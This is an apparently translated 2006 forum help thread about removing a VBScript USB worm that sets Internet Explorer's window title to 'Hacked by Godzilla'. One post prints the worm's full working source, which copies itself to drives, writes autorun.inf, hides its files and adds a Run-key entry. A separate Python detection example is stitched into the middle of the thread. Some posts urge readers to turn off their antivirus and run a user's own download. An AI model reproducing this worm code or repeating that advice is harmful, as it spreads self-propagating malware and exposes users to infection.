slaughters, posted December 5, 2006:
wscript.. I don't know what else to do. I'm using Avast AV, and it can't kill or detect this thing automatically. This is about ravmon: when you click on a partition you can't get in; it only works with a right-click. To delete the autorun.inf file you have to kill the wscript process first.... What should I do?
scorps, posted December 5, 2006:
> wscript.. I don't know what else to do. I'm using Avast AV, and it can't kill or detect this thing automatically. This is about ravmon: when you click on a partition you can't get in; it only works with a right-click. To delete the autorun.inf file you have to kill the wscript process first.... What should I do?
Have you tried booting Windows in safe mode?
slaughters, posted December 5, 2006:
> Have you tried booting Windows in safe mode?
What would I go into safe mode for? Actually the process can be "killed".. but that's the thing.. ermm.. I want to know how to find its "mother".. so annoying.. hehe..
blurruitm, posted December 5, 2006:
> I want to know how to find its "mother".. so annoying.. hehe..
Usually with this kind of virus you have to remove it from startup first, and only then delete the virus manually. Try looking in windows > system32, or else inside windows. Be a bit careful not to delete the wrong thing; just don't delete system files.
hampeh, posted December 5, 2006:
Try using Process Explorer and Process Viewer.. download from http://www.microsoft.com/technet/sysinternals/default.mspx
scorps, posted December 5, 2006:
> What would I go into safe mode for? Actually the process can be "killed".. but that's the thing.. ermm.. I want to know how to find its "mother".. so annoying.. hehe..
Do you just want to kill it, or delete it outright?? If you only kill it, the process will come back the next time you reboot the computer.. or have I misunderstood???
alternat0r, posted December 5, 2006:
Try testing this antivirus software I made... who knows, it might detect something... make sure you turn off your existing antivirus first and only then run this program... Download at: Server 1
slaughters, posted December 6, 2006:
> Do you just want to kill it, or delete it outright?? If you only kill it, the process will come back the next time you reboot the computer.. or have I misunderstood???
ermm.. I said I can kill the process.. huhu.. so how, can the process be deleted?
> Try testing this antivirus software I made... who knows, it might detect something... make sure you turn off your existing antivirus first and only then run this program... Download at: Server 1
You made this antivirus yourself? Wow.. ok.. I'll try it first.. anyway, thanks..
001x0, posted December 6, 2006:
wscript.exe is 'registered' as Microsoft ® Windows Script Host.
Its expected location is C:\WINDOWS\system32\wscript.exe
If you want to activate wscript.exe and adjust it a little: from Run -> type wscript.exe -> enable 'stop script after specified number of second'
If you just want to enable/disable wscript.exe: download -> click to enable/disable
http://www.symantec.com/avcenter/noscript.exe
* If you want to delete it, that may be possible in safe mode, but I don't know what the effect would be; maybe IE ActiveX, JavaScript, VBScript and other Windows components would stop working
* Wscript.exe and Cscript.exe are part of the IE components, I think
* You need to find its 'mother' first; wscript.exe isn't at fault. Run Spybot & paste a HijackThis log
slaughters, posted December 11, 2006:
Logfile of HijackThis v1.99.1
Scan saved at 8:41:05 AM, on 12/11/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5730.0011)
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Documents and Settings\Administrator\Desktop\hijackthis\HijackThis.exe
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O8 - Extra context menu item: &Clean Traces - C:\Program Files\DAP\Privacy Package\dapcleanerie.htm
O8 - Extra context menu item: &Download with &DAP - C:\Program Files\DAP\dapextie.htm
O8 - Extra context menu item: Download &all with DAP - C:\Program Files\DAP\dapextie2.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O11 - Options group: [iNTERNATIONAL] International*
O17 - HKLM\System\CCS\Services\Tcpip\..\{2F158875-931F-4DF7-BAF1-732836AEB8C9}: NameServer = 10.20.16.2,10.20.16.3
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
ermm.. here's the HijackThis log..
HTM a.k.a. whiztech, posted December 11, 2006:
> R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla
My PC got hit by this VBS once.. here's its code.. I still keep it in the avast! virus chest...

    'My name is Slow but sure V0.04
    on error resume next
    dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
    atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
    set fs = createobject("Scripting.FileSystemObject")
    set mf = fs.getfile(Wscript.ScriptFullname)
    dim text,size
    size = mf.size
    check = mf.drive.drivetype
    set text=mf.openastextstream(1,-2)
    do while not text.atendofstream
      mysource=mysource&text.readline
      mysource=mysource & vbcrlf
    loop
    do
      Set winpath = fs.getspecialfolder(0)
      set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
      tf.attributes = 32
      set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
      tf.write mysource
      tf.close
      set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
      tf.attributes = 39
      for each flashdrive in fs.drives
        If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
          set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
          tf.attributes =32
          set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
          tf.write mysource
          tf.close
          set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
          tf.attributes =39
          set tf =fs.getfile(flashdrive.path &"\autorun.inf")
          tf.attributes = 32
          set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
          tf.write atr
          tf.close
          set tf =fs.getfile(flashdrive.path &"\autorun.inf")
          tf.attributes=39
        end if
      next
      set rg = createobject("WScript.Shell")
      rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
      rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla"
      if check <> 1 then
        Wscript.sleep 200000
      end if
    loop while check<>1
    set sd = createobject("Wscript.shell")
    sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Try searching for the file MS32DLL.dll.vbs; make sure you tick the advanced options to search subfolders, system folders and hidden files/folders... This script usually sits on every local partition (C:\MS32DLL.dll.vbs, d:\MS32DLL.dll.vbs) and in c:\windows\MS32DLL.dll.vbs, I think.. correct me if I'm wrong..
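The indicators named in the posts above (the autorun.inf launch line, the Run value, and the IE Window Title line in the HijackThis log) can be checked mechanically. The Python below is an added example, not code from the thread or from any tool mentioned in it; the function names and the O4 line for MS32DLL are constructed for illustration.

```python
import re

# Script hosts and script extensions that should not be an AutoRun or Run-key target.
SCRIPT_RE = re.compile(r"\b(?:wscript|cscript)(?:\.exe)?\b|\.(?:vbs|vbe|js|jse|wsf)\b", re.I)
# [autorun] keys that start a program: open=, shellexecute=, shell\<verb>\command=
LAUNCH_KEY_RE = re.compile(r"^(?:open|shellexecute|shell\\[^\\]+\\command)$", re.I)
# HijackThis line formats as they appear in the log posted in this thread.
HJT_TITLE_RE = re.compile(r"^R\d - HKCU\\Software\\Microsoft\\Internet Explorer\\Main,Window Title = (.*)$")
HJT_RUN_RE = re.compile(r"^O4 - (HK\w+)\\\.\.\\Run: \[([^\]]*)\] (.*)$")

def autorun_script_launchers(inf_text):
    """Return (key, value) pairs from the [autorun] section that launch a script."""
    hits, in_section = [], False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
        elif in_section and "=" in line and not line.startswith(";"):
            key, value = (part.strip() for part in line.split("=", 1))
            if LAUNCH_KEY_RE.match(key) and SCRIPT_RE.search(value):
                hits.append((key, value))
    return hits

def hijackthis_findings(log_text):
    """Return IE title overrides and Run entries whose command starts a script."""
    findings = []
    for raw in log_text.splitlines():
        line = raw.strip()
        title = HJT_TITLE_RE.match(line)
        run = HJT_RUN_RE.match(line)
        if title:
            findings.append(("ie-window-title", title.group(1)))
        elif run and SCRIPT_RE.search(run.group(3)):
            findings.append(("run-key-script", run.group(2), run.group(3)))
    return findings

# SAMPLE_INF is the autorun.inf text the posted script writes to each drive.
# In SAMPLE_LOG the first two lines are copied from the posted HijackThis log;
# the MS32DLL O4 line is constructed (an assumption about how HijackThis would
# render the Run value the script registers).
SAMPLE_INF = "[autorun]\r\nshellexecute=wscript.exe MS32DLL.dll.vbs\r\n"
SAMPLE_LOG = "\n".join([
    r"R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla",
    r"O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP",
    r"O4 - HKLM\..\Run: [MS32DLL] C:\WINDOWS\MS32DLL.dll.vbs",
])

if __name__ == "__main__":
    print(autorun_script_launchers(SAMPLE_INF))
    print(hijackthis_findings(SAMPLE_LOG))
```

A Window Title finding means only that the value is set and should be reviewed; the Run-key and autorun.inf findings point at the files to locate before deleting anything.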
alternat0r, posted December 11, 2006:
If you have a sample, please upload it to http://www.data0.net and I'll help build detection and removal for it...
ApoNie, posted December 11, 2006:
For safety's sake, better not to expose that code..
alternat0r, posted December 11, 2006:
I've updated Portable Antivirus for the virus mentioned above... try a scan first... Download here...
slaughters, posted December 11, 2006:
> I've updated Portable Antivirus for the virus mentioned above... try a scan first... Download here...
You're really great.. ok.. I'll try it in a moment.. thanks!
slaughters, posted December 12, 2006:
> You're really great.. ok.. I'll try it in a moment.. thanks!
The portable antivirus you made is good.. it detects it.. but I still can't get rid of hacked by godzilla!! What do I do! I think we need a dedicated thread to discuss this thing.. my whole network has been hit.. so annoying...
unexistance, posted December 12, 2006:
Have you tried using search? (*.vbs)
Then see where it put them..
The usual 'mother' folders (from experience):
1. hidden folder in c:\windows
2. c:\documents and settings\username\application data
3. c:\documents and settings\username\local settings\application data
4. c:\documents and settings\username\templates
p/s: but don't just delete blindly, or you may end up unable to boot. VBS files usually aren't critical to the system, so you could say it's safe, but be careful..
joetbg_x, posted December 12, 2006:
> but I still can't get rid of hacked by godzilla!!
Change it yourself in the registry:
HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla
slaughters, posted December 12, 2006:
> Change it yourself in the registry:
> HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla
hoho.. hacked by Godzilla is sorted.. hehe.. thanks..
zareight, posted December 13, 2006:
I got hit too.. what now? I can't double-click the partition.. I don't understand the method you all taught..
> Try searching for the file MS32DLL.dll.vbs; make sure you tick the advanced options to search subfolders, system folders and hidden files/folders... This script usually sits on every local partition (C:\MS32DLL.dll.vbs, d:\MS32DLL.dll.vbs) and in c:\windows\MS32DLL.dll.vbs, I think.. correct me if I'm wrong..
How do I make the PC's partitions open on double-click again? My computer got hit too..
alternat0r, posted December 13, 2006:
Download the latest Portable Antivirus to detect this type of virus... This virus will be detected as VBS/Slowbut. I've made detection for 2 variants plus the junk left behind by the virus... If the virus is running, PAV will automatically terminate the running process... Try it first... Don't worry, the registry and the 'H@cked by ...' text will be fixed automatically too...
zareight, posted December 13, 2006 (edited December 13, 2006 by zareight):
It works now.. thanks alternator and everyone who helped...
Impreza_2004, posted December 14, 2006:
wscript.exe
wscript.exe - Here is the scoop on Vbswg.Aq Worm as it pertains to computer network security. The big question: what is wscript.exe and is it spyware, a trojan and if so, how do I get rid of Vbswg.Aq Worm?
wscript.exe (Vbswg.Aq Worm) - Details
If a process named wscript.exe is running on your computer, you may have been infected with a strain of the Vbswg.Aq worm.
wscript.exe is considered to be a security risk, not only because antivirus programs flag Vbswg.Aq Worm as a virus, but also because a number of users have complained about its performance.
Vbswg.Aq Worm is likely a virus and as such, presents a serious vulnerability which should be fixed immediately! Delaying the removal of wscript.exe may cause serious harm to your system and will likely cause a number of problems, such as slow performance, loss of data or leaking private information to websites.
You should visit our free spyware removal page to make sure your system does not have other programs like wscript.exe.
WSCRIPT.EXE - Disclaimer
Every attempt has been made to provide you with the correct information for wscript.exe or VBSWG.AQ WORM. Many spyware/malware programs use filenames of usual, non-malware programs. If we have included information about wscript.exe that is inaccurate, we would greatly appreciate your help by updating the spy bot database and we'll promptly correct it.
You should verify the accuracy of information we provided about wscript.exe. Vbswg.Aq Worm may have had a status change since this page was published.
firefolk, posted December 14, 2006:
Try disabling it first: START > RUN > MSCONFIG > STARTUP tab.
alternat0r, posted December 15, 2006:
> wscript.exe
> wscript.exe - Here is the scoop on Vbswg.Aq Worm as it pertains to computer network security. The big question: what is wscript.exe and is it spyware, a trojan and if so, how do I get rid of Vbswg.Aq Worm?
> wscript.exe (Vbswg.Aq Worm) - Details
> If a process named wscript.exe is running on your computer, you may have been infected with a strain of the Vbswg.Aq worm.
> . . .
In short, wscript.exe is for running Visual Basic Script files... this file is not a virus; Microsoft does provide it in every Windows, but it can pose a security risk (Low)... Vbswg means Visual Basic Script Worm Generator.